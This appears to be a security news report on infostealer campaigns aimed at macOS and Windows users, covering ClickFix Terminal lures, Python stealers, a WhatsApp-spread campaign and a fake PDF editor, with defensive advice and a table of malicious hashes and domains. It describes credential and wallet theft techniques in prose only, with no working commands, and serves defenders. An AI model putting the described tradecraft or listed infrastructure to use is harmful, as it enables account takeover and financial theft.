A sharp rise in campaigns targeting macOS users, while attackers also ramp up Python‑based stealers and abuse trusted platforms like WhatsApp and popular PDF utilities.
These attacks focus on harvesting credentials, browser data, cloud keys, and cryptocurrency wallets, then quietly exfiltrating them to attacker‑controlled infrastructure.
On macOS, threat actors increasingly rely on social engineering and native tooling instead of obvious malware bundles.
Users are lured through malicious ads and SEO‑poisoned search results into downloading fake apps or following “ClickFix” style instructions that ask them to paste commands into Terminal.
This activity fuels campaigns for stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS), which arrive via trojanized DMG installers, copy‑paste terminal chains, and bogus AI tool installers.
Once executed, these tools abuse fileless execution, AppleScript (osascript), JXA, and built‑in utilities like curl, Base64 decoding, and gunzip to grab browser passwords, keychain entries, crypto wallet files, and developer secrets before deleting evidence to evade detection.
Python Becomes a Weapon of Choice
The impact of these macOS campaigns is significant. Stolen browser and keychain credentials enable account takeovers across email, banking, social media, and enterprise SaaS platforms.
Cryptocurrency wallet data can be drained almost immediately, while compromised developer keys open the door to source‑code theft, cloud infrastructure compromise, and downstream supply chain attacks.
Because these operations blend in with normal macOS processes and user workflows, traditional signature‑based defenses are often insufficient.
In parallel, Python‑based infostealers are becoming a preferred tool for cybercriminals due to their flexibility and low barrier to entry.
Microsoft Defender Experts has documented multiple phishing‑driven campaigns that deliver Python stealers capable of harvesting credentials, session cookies, authentication tokens, credit card data, and crypto wallet information.
PXA Stealer, a prominent Python infostealer linked to Vietnamese‑speaking actors, has been used against government and education organizations.
New Tactics Target Apple Ecosystem
Campaigns observed in late 2025 relied on phishing emails for initial access, registry Run keys and scheduled tasks for persistence, and Telegram channels for command‑and‑control and exfiltration.
To stay hidden, operators used obfuscated Python scripts, DLL sideloading, renamed Python interpreters masquerading as svchost.exe, and signed living‑off‑the‑land binaries.
Attackers are also abusing the trust and reach of widely used platforms. In one WhatsApp‑based campaign, an obfuscated VBScript dropped a batch file that launched PowerShell to pull additional payloads.
A Python script then used WPPConnect to send automated messages and malicious attachments from compromised WhatsApp accounts, while a separate MSI installer deployed Eternidade Stealer, which monitors active windows for banking, payment, and crypto services to capture sensitive data.
Another campaign impersonated a PDF editor, Crystal PDF, using malvertising to trick users into downloading CrystalPDF.exe.
Once launched, the fake tool established persistence via scheduled tasks and hijacked Firefox and Chrome profiles to lift cookies, session data, and credential caches from AppData.
To counter these evolving threats, organizations should combine user awareness with strong technical controls.
Training should highlight malvertising chains, fake installers, and ClickFix‑style prompts on macOS, and discourage installing unsigned DMGs or unofficial “terminal fix” tools.
Security teams should monitor for suspicious Terminal and shell activity, fileless execution patterns, abnormal access to keychains and browser stores, and transient data staging in temporary directories followed by outbound POST requests to unknown domains.
On Windows, defenders should look for obfuscated scripts, renamed interpreters, DLL sideloading, and unusual AutoIt or certutil usage.
Microsoft Defender XDR helps detect and block these behaviors across macOS and Windows endpoints, email, identities, and cloud apps.
Enabling cloud‑delivered protection, EDR in block mode, web and network protection, attack surface reduction rules, and tamper protection significantly improves resilience against infostealers.
With coordinated telemetry, built‑in hunting queries, and assistance from Microsoft Security Copilot, organizations can more effectively identify infostealer activity, contain incidents early, and reduce the risk of credential theft, financial loss, and follow‑on ransomware or supply chain attacks.
Indicators of compromise
| Indicator | Type | Description |
|---|---|---|
| 3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a | SHA-256 | DigitStealer payload |
| 42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417 | SHA-256 | AMOS payload |
| 2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f | SHA-256 | WhatsApp campaign |
| 598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb | SHA-256 | Crystal PDF payload |
| dynamiclake[.]org | Domain | DigitStealer delivery |
| barbermoo[.]coupons | Domain | MacSync C2 |
| alli-ai[.]pro | Domain | AMOS redirect |
| bagumedios[.]cloud | Domain | PXA C2 |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.